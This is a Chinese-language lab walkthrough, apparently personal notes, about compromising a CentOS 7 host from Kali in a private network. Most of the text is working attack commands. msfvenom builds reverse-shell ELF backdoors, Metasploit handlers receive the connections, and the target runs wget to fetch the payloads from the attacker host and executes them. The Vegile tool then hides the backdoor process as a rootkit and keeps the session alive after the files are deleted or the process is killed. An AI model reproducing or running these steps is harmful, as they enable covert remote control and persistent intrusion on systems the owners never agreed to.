攻击机（kali）：10.211.55.6
靶机（centos7）：10.211.55.7

8080端口创建连接，上传Vegile；
4444木马放到Vegile目录下，无文件执行；（Vegile执行木马后，删除木马及Vegile也会持续执行）


攻击机（kali）：10.211.55.6
恶意文件，让靶机执行
┌──(root💀kali-linux-2021-3)-[~]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=10.211.55.6 LPORT=8080 -b "\x00" -f elf -o /var/www/html/laohe_backdoor
用来拿权限
给靶机下载这个

生成一个用来隐藏的后门
┌──(root💀kali-linux-2021-3)-[~]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=10.211.55.6 LPORT=4444 -b "\x00" -f elf -o /var/www/html/laohe_ghost



上传vegile维吉尔工具到网站目录下，方便centos下载
权限维持，设置后门，rootkit，会隐藏进程；无线连接，
下载地址：https://github.com/screetsec/Vegile

./Vegile --i
隐藏后门

./Vegile --u
无限复制你的metaspoit会话，即使被kill，也能再次运行

生成的木马，一定要放在Vegile目录下；用与维持会话

┌──(root💀kali-linux-2021-3)-[~]
└─# mv ~/Vegile-master /var/www/html 
                                                                                                                                             
┌──(root💀kali-linux-2021-3)-[~]
└─# ls /var/www/html

靶机（centos7）：10.211.55.7
┌──(root💀kali-linux-2021-3)-[~]
└─# msfconsole

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.211.55.6
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > exploit -j
后台监听
msf6 exploit(multi/handler) > sessions
当前还未建立连接
msf6 exploit(multi/handler) > jobs
sessions看不到，jobs能看到

###进入靶机
wget http://10.211.55.6/laohe_backdoor
chmod +x laohe_backdoor
./ laohe_backdoor

###进入攻击机
后台监听，需要查看
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 1
启动
msf6 exploit(multi/handler) > sessions会话

查看当前进程ID
netstat -lntpu | grep 8080
查看8080这个木马是否已执行成功

如ifconfig无法执行时，加上绝对路径
which ifconfig
查绝对路径
/sbin/ifconfig即可

这个8080的session保留，用来创建无文件的木马

###攻击机，重启终端，搞4444端口
┌──(root💀kali-linux-2021-3)-[~]
└─# msfconsole

msf6 > use exploit/multi/handler     
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp 
msf6 exploit(multi/handler) > set LHOST 10.211.55.6
msf6 exploit(multi/handler) > set LPORT 4444
使用幽灵4444木马
msf6 exploit(multi/handler) > exploit -j
后台监听，jobs查看


###8080攻击成功后，执行靶机；下载Vegile-master工具
从8080攻击成功的会话
wget http://10.211.55.6/Vegile-master.zip
unzip Vegile-master.zip

木马放到Vegile-master目录
cd Vegile-master
chmod +x Vegile
此目录下载，4444的木马
wget http://10.211.55.6/laohe_ghost
chmod +x laohe_ghost

隐藏执行
./Vegile --i laohe_ghost
执行中如果报错，No such file or directory
执行
echo "" > /etc/ld.so.preload

./Vegile --u laohe_ghost
无线复制会话，即使被kill，依然会再次执行


####回到靶机查看4444端口的会话
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 1
执行会话

此时删除Vegile所有目录和木马，会话连接不会断
















